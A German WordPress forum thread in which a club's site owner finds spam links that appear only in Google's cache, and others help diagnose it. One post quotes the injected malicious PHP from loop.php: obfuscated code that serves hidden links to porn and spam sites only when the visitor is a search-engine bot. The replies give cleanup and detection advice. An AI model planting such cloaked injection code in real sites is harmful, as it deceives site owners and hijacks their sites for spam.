Komische Links auf meiner Seite im Google Cache

  • Hallo,

    ich habe folgendes Problem:

    Gestern habe ich den Text "Schützenverein Uthleben" in Google gesucht und hatte auch meine Seite als ersten Treffer. Soweit so gut, wenn man nun aber mal auf den kleinen Pfeil rechts neben dem Treffer anklickt und den Google Cache aufruft sieht man unter dem letzten Beitrag komische Links zu einer WordPress Theme Seite und einigen Seiten mit einer RO TLD.

    Ich habe natürlich gleich meine Seite im Original geprüft mit: eingeloggt, ausgeloggt (Besucher), anderer Browser, AdBlock Plugin des Browsers aus. Aber die Links werden auf der Original Seite nicht angezeigt. Auch die ganze MySql Datenbank habe ich nach Teilen der Domains durchsucht aber erhielt null Treffer und auch in den entsprechenden Templates des Themes waren keine Einträge.

    Wie kommt das zustande und was hab ich eventuell noch nicht geprüft, denn irgendwo muss Google ja die Einträge her haben.

    Danke

    Einmal editiert, zuletzt von maxe (16. Dezember 2016 um 20:02)

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren


  • Ich habe natürlich gleich meine Seite im Original geprüft mit: eingeloggt, ausgeloggt (Besucher), anderer Browser, AdBlock Plugin des Browsers aus.

    und den Content aus Google Sicht betrachtet - dafür gibt es Plugins, die den Googel Bot Header an eine Seite senden.



    Auch die ganze MySql Datenbank habe ich nach Teilen der Domains durchsucht aber erhielt null Treffer und auch in den entsprechenden Templates des Themes waren keine Einträge.

    In der Regel sind die Änderungen auch in Base64 codiert

    http://www.php.net/manual/de/function.base64-encode.php

    viel glück

    Mit offenen Augen träumen

  • Hallo r23,

    danke erst mal für deine Antwort.

    Zu Punkt 1: Nein das habe ich nicht. Wie heißt denn das entsprechende Plugin?

    Zu Punkt 2: Gehe ich recht in der Annahme das diese Maßnahmen dazu dienen vor dem Betreiber der Webseite den Anschein zu wahren das die Seite völlig frei von ungewollten Links ist, jedoch beim Google Bot Backlinks generiert? Außerdem würde mich interessieren wie ich den Schadcode ausfindig mache und lösche.

    Danke

    KMGTB

  • Ich wollte zwar eigentlich meinen Beitrag editieren, aber das scheint in diesem Forum nicht gewollt zu sein.

    Ich habe den Schadcode in der Datei "loop.php" ausfindig gemacht. Hier mal der Übeltäter:

    PHP
    <?php 
    $x0d="<!-- /.article -->"; 
    $x0b = $_SERVER['HTTP_USER_AGENT'];$x0c="\040\x0d\x0a<\141 \150re\x66\075'\150t\x74\x70\072//\x77\167\x77\056\0610\x30\061\146\x72\145e\167\160\164\x68\x65\155\145s\056c\157\155/\x63\x61t\145go\162\x79/\145l\145\147\x61n\164-\x74\x68e\x6d\145\x73\x2f\x20'\076 \x57\157\x72d\x50\x72\x65\x73\163\x20\124h\145mes\074/\x61\x3e
    \x0a\x3c\x61\040\x68\x72ef\x3d'\x68\164\x74\x70:\057/\167ww\056\146r\x65\145\x73\x65\x78x\170\143\x68\x61\164.\143\157\155\040'>\x20\163\x65x\x20ch\141\x74 s\150\x6fw\074\x2fa>
    \x0a\074\x61\040\x68\162\145\146\x3d'h\x74\164p\072\057\x2f\x77\x77w\x2eso\x6ce\164\141\x2e\162\157\x20'\076\x20wo\157\144\040\x68\157u\x73\x65\x20\x68\157\x6d\x65\163\074\057\141>\x0d
    <\141\040\x68\x72\145\x66\x3d'\150\164tp:/\x2fw\x77w\x2e\151\x74\x65\170\143\154\x75s\x69\x76\x2e\x72\x6f '> \x63\x72ear\145\x20s\x69\x74\145\x3c\057\x61>\015\012\011\x09";if ($x0d('*bot*', $x0b)) { echo $x0c;} else {echo '';}?>

    Danke für die Hilfe r23!

    Grüße KMGTB

  • Zu Punkt 2: Nicht nur Google. Wenn der User Agent ein Browser, so wird die Seite ohne Links ausgeliefert, wenn der User ein Bot, dann mit Links. So findest Du die Links auch bei Bing im Cache.

    Hätte G nicht alles abgewertet, was einst fürs Linkbuilding dienlich war, käme nun keiner auf die Idee dafür gutbezahlte Hacker zu beauftragen.

    Das Du den Code gefunden hast, ist ja nur ein Anfang, Du musst ja noch feststellen, wie die Zugriff erhielten und ob noch mehr verseucht ist.

    Einmal editiert, zuletzt von Melewo (28. April 2014 um 20:28)

  • Hallo Melewo,

    ja das ist jetzt eine gute Frage wie das eingeschleust wurde. Ich habe nun mal einen Tracker für die Logins der Admins ins Backend installiert. Kann man sonst noch etwas tun um das Loch zu finden?

    Außerdem werde ich jetzt noch mal alle Dateien durchgehen und prüfen ob Sie im Vergleich zum Original anders sind.

    Danke!


  • Zu Punkt 1: Nein das habe ich nicht. Wie heißt denn das entsprechende Plugin?

    Google Webmastertools. Hier => Abruf wie durch Google

    oder
    http://chrispederick.com/work/user-agent-switcher/

    In der Regel sollte man die Suchbegriffe die Google mit der eigenen Seite verbindet beobachten. Sex / Porno macht sich nicht so gut für einen Schützenverein.


    Gehe ich recht in der Annahme das diese Maßnahmen dazu dienen vor dem Betreiber der Webseite den Anschein zu wahren das die Seite völlig frei von ungewollten Links ist, jedoch beim Google Bot Backlinks generiert?

    Warum nur so harmlos denken? Was hat ein Angreifer von Backlinks? Für ein Angreifer sind die Besucher doch viel angenehmer. Er leitet einfach nach einem Zufallprinzip jeden x Besucher, der über eine Suchmaschinen zu der WebSite kommt einfach auf seine Schweinkarmseite weiter. Für den Besucher macht der Schützenverein halt Schweinkram.

    Der Betreiber bekommt dies eh nur selten mit. Und wenn er dies findet macht er genau dies:


    Außerdem würde mich interessieren wie ich den Schadcode ausfindig mache und lösche. Danke KMGTB

    Auch dafür gibt es Werkzeuge. mit Firebord einfach Datei Verzeichnisse vergleichen und die geänderten Dateien austauschen.

    Wenn du dies 08/15 machst - hast du die Sicherheitslücke noch im System. Mit Auswertungen der Log-Files und etwas PHP Kenntnisse (vermutlich ein upload Script im Template) kann man dies eben beseitigen.

    wenn du diesen 08/15 Weg beschreitest, muss ich dich an dieser Stelle leider enttäuschen. Der Angreifer hat sich in der Regel ein Werkzeuge in ein Verzeichnis kopiert. Und mit http://www.example.org/wunderbar.php kann er in wenigen Sekunden seine Änderungen erneut einfügen. d.h. auch diese Werkzeuge musst du finden.

    und jetz kommt das richtige Probelm. Der Angreifer hat eine Datei auf dem Server geändert! Der Angreifer hat etwas auf dem Server - auf deinen Webspace geschrieben! warum sollte er sich nicht mal eben einen eigenen Account einrichten und nur Dateien verändern?

    Du kannst keiner Datei mehr trauen, keinem Datensatz. Du kannst nur alles löschen! und eine Bereinige (ohne Sicherheitslücke) Datensicherung zurück kopieren.

    und dir über das Job Forum einen Dienstleister suchen, der das System absichert.

    Viel Glück

    ralf

    Mit offenen Augen träumen

  • Mal ne Frage: Warum empfiehlt hier niemand Wordfence - oder ein Plugin mit gleichem Anspruch? Vom Anspruch her vergleicht Wordfence ja die Original-Scripte auf Wrodpress.org mit den aktuellen Dateien. So wären doch Veränderungen schnell auffindbar - oder nicht?

  • Warum empfiehlt hier niemand Wordfence


    Benutzt Du dieses Plugin?

    https://wordpress.org/plugins/wordfence/installation/

    Bin mir nicht sicher, ob das wirklich so gut ist. Wenn das einmal pro Nacht durchlaufen würde, in einer Zeit, wo eh nur mit vereinzelten Besuchern zu rechnen ist, was ja nur über einen echten Cron möglich wäre. Doch da fängt es ja bereits an, die Einsteiger, deren Pakete entweder keinen Cron enthalten oder die mit der Einrichtung eines Cronjobs schlicht überfordert wären.

    Ich meine, ich kenne das Plugin nicht und so sind das jetzt nur Gedanken, nach dem Lesen der ersten Beiträge über dieses Plugin.

    http://fastwp.de/plugins/wordfe…herheit-extrem/
    http://www.nicht-spurlos.de/wordfence-word…absichern/4600/

  • um Gottes willen nein - ich benutze es nicht. Aber ich könnte mir eben vorstellen, es temporär zu installieren, um einen Scan durchzuführen, falls notwendig. Ich habe es local getestet und es hat meine Änderungen der Dateien gut gefunden. ...

    Zitat

    Sicherheit ist wichtig, aber das muss nicht unbedingt mit einem so umfangreichen Plugin sein. Den Scan darf man sich natürlich trotzdem gönnen, nur um zu überprüfen, ob nicht schon schadhafter Code vorhanden ist.

    Ich glaube sogar, dass die Deinstallationsroutine des Plugins die eigenen Einträge aus der wp_options sauber entfernt.

    Einmal editiert, zuletzt von Deinhard (29. April 2014 um 10:56)

  • um einen Scan durchzuführen, falls notwendig.


    Angeregt durch einen Thread mit Posts von g3h und r23 hatte ich mir mal Gedanken gemacht. Du brauchst da nichts mit externen Quellen vergleichen, sondern einfach nur den Wert = md5_file($von_file_noch_sauber) gespeichert in Liste mit dem Wert = md5_file($file_von_heute), da dieser Wert unbestechlich zu sein schein.

    http://forum.wpde.org/allgemeines/12…cherheit-4.html

    Da ich aber von einer angefangenen und noch unvollendeten Angelegenheit in die nächste stolpere, habe ich da noch nicht weiter gemacht. Ohne echten Cron würde das aber auch nicht laufen, womit das als Plugin für Einsteiger nicht geeignet wäre.

    Ich glaube sogar, dass die Deinstallationsroutine des Plugins die eigenen Einträge aus der wp_options sauber entfernt.


    Sollte eigentlich jedes Plugin, ist auch kein großes Problem mit delete_option( '...' ) und register_deactivation_hook(...).

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!